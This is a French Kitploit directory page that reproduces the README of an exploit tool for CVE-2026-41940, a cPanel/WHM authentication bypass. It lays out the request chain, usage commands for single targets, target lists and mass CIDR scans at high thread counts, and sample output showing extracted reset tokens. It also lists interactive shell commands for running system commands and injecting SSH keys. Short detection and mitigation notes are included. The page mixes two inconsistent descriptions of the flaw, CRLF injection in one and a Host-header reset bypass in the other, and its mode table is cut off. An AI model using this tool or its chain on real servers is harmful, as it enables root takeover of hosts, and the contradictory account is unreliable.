Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Contournement d'authentification cPanel/WHM par Dr.Anach, injection CRLF dans le gestionnaire d'authentification Basic `cpsrvd` → accès non authentifié à l'API WHM → RCE en tant que root. Tous les cPanel depuis la v11.40 sont concernés. | Kitploit
Outils/GitHubGitHub/anach-ai/cve-2026-41940
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
GitHub
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
anach-ai/cve-2026-41940

CVE-2026-41940

CVE-2026-41940 — Contournement d'authentification cPanel/WHM par Dr.Anach, injection CRLF dans le gestionnaire d'authentification Basic `cpsrvd` → accès non authentifié à l'API WHM → RCE en tant que root. Tous les cPanel depuis la v11.40 sont concernés.

Voir le dépôt
Partager

CVE-2026-41940 — Contournement d'authentification cPanel/WHM

Auteur : Dr.Anach | Contact : @dranach | Licence : MIT


Vue d'ensemble

Injection CRLF dans le gestionnaire d'authentification Basic de cpsrvd → accès API WHM non authentifié → RCE en tant que root. Toutes les versions de cPanel depuis la v11.40 sont concernées.

Chaîne d'attaque

#ÉtapeRequête
1Créer une sessionGET /login/?user=root
2Injection CRLFAuthorization: Basic <base64> — le mot de passe contient une charge utile \r\n
3Promotion en cacheGET /cpsess<ID>/login/?login_only=1
4ExécutionGET /cpsess<ID>/execute/API/func

Installation

root@kitploit:~
pip install requests colorama

Voici le README.md final — convivial, pratique et axé sur l'efficacité.


Exploit de contournement d'authentification cPanel — CVE-2026-41940

Auteur : Dr.Anach · Telegram : @dranach
Version : 2.0.0
Licence : Réservé aux tests de sécurité autorisés


Ce que fait cet outil

Exploite la CVE-2026-41940, un contournement d'authentification dans cPanel & WHM (versions 11.x à 106.x). La vulnérabilité permet à un attaquant non authentifié d'accéder à des points de terminaison restreints — y compris la fonction de réinitialisation de mot de passe — en envoyant un en-tête Host spécialement conçu pointant vers un serveur contrôlé par l'attaquant.

Comprend trois modes :

ModeOptionFonction
Cible unique-t

Installation

Prérequis

  • Python 3.7+ (testé sur Windows, Linux, macOS)
  • Bibliothèque requests
root@kitploit:~
pip install requests

Aucune autre dépendance. L'expansion CIDR utilise le module intégré ipaddress de Python — rien à installer en plus sur Windows.


Démarrage rapide

Tester une cible unique

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

Tester une liste de cibles (une par ligne)

root@kitploit:~
python main.py --batch targets.txt --threads 50

Format de targets.txt :

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

Scanner un sous-réseau entier (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

Cette commande développe 192.168.128.0/18 (16 384 IP), effectue une vérification rapide de port sur chacune, et ne tente l'exploitation que sur les hôtes dont le port 2087 (cPanel/WHM) est ouvert.


Toutes les options

root@kitploit:~
  -t, --target        Cible unique (IP ou domaine)
  --batch FILE        Fichier contenant les cibles (une par ligne)
  --port-scan CIDR    Plage CIDR à scanner (ex. : 192.168.128.0/18)
  -p, --port          Port cible (défaut : 2087)
  --ssl               Utiliser HTTPS (défaut : HTTP)
  --timeout SEC       Délai de connexion en secondes (défaut : 10)
  --threads N         Nombre maximal de threads concurrents (défaut : 50)
  --proxy PROXY       Proxy HTTP (ex. : http://127.0.0.1:8080)
  -v, --verbose       Sortie détaillée avec informations de débogage
  --no-banner         Masquer la bannière
  --version           Afficher la version

Comprendre la sortie

root@kitploit:~
[+] 192.168.130.45:2087 — VULNÉRABLE !
    → URL de réinitialisation de mot de passe : http://192.168.130.45:2087/reset?token=abc123
    → Temps de réponse : 1.23s

[-] 192.168.131.10:2087 — Non vulnérable
    → Raison : aucun point de terminaison de réinitialisation de mot de passe trouvé

[!] 192.168.129.22:2087 — Erreur : Connexion refusée

Les résultats enregistrés au format JSON sont structurés par hôte avec l'état de vulnérabilité, les jetons extraits et les détails bruts des réponses.


Exemple pratique : scanner un /18 sur Windows

Le scénario qui vous a probablement amené ici :

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

Comment cela fonctionne :

  1. Développe 192.168.128.0/18 → 16 384 IP en interne
  2. Pré-filtre avec un scan TCP connect rapide sur le port 2087 (ignore les hôtes inactifs)
  3. Exploite uniquement les hôtes dont le port est ouvert
  4. Rapporte les hôtes vulnérables avec les jetons de réinitialisation extraits

Conseils sur les threads :

  • --threads 100 fonctionne bien (respecte les limites de sockets par défaut)
  • Pour des scans plus rapides sur de bonnes connexions : --threads 200
  • En cas de limitation de débit : réduisez à --threads 30 et augmentez --timeout

CVSS et risque

CVSS 9.1 (Critique) — Aucune authentification requise, aucune interaction utilisateur, faible complexité.

Impact

  • Réinitialisation non autorisée du mot de passe de tout compte cPanel
  • Reprise totale du compte
  • Élévation de privilèges de limité à administrateur dans certaines configurations

Correctifs

  • Mettre à jour cPanel/WHM vers la dernière version corrigée
  • Valider les en-têtes Host côté serveur
  • Restreindre l'accès WHM par IP lorsque c'est possible

Légal

Cet outil est réservé aux évaluations de sécurité autorisées uniquement. Vous devez posséder les cibles ou avoir l'autorisation écrite du propriétaire avant de tester. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.

Commandes du shell interactif

root@kitploit:~
help       Afficher les commandes
info       Informations sur le serveur
passwd     Changer le mot de passe
accounts   Lister les comptes cPanel
enum       Énumération complète
shell      Exécuter une commande système
ssh-add    Injecter une clé SSH
exec       Exécuter un one-liner Python
exit       Quitter

Détection

Vérifier les fichiers de session :

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

Journaux suspects dans /usr/local/cpanel/logs/access_log :

root@kitploit:~
/login/?user=root        → création de session
/login/?user=root        → injection CRLF
/cpsess*/login/?login_only=1  → promotion en cache
/cpsess*/execute/*       → abus d'API

Atténuation

root@kitploit:~
# 1. Appliquer le correctif vers la version corrigée
# 2. Faire pivoter tous les mots de passe et clés SSH
# 3. Purger les sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

Crédits

  • Vulnérabilité : Sina Kheirkhah / watchTowr Labs
  • Framework : Dr.Anach (@dranach)
Télécharger l’outil
Tester une IP ou un domaine
Fichier de liste--batchCharger une liste de cibles depuis un fichier
Scan CIDR--port-scanÉtendre un sous-réseau et tester chaque hôte actif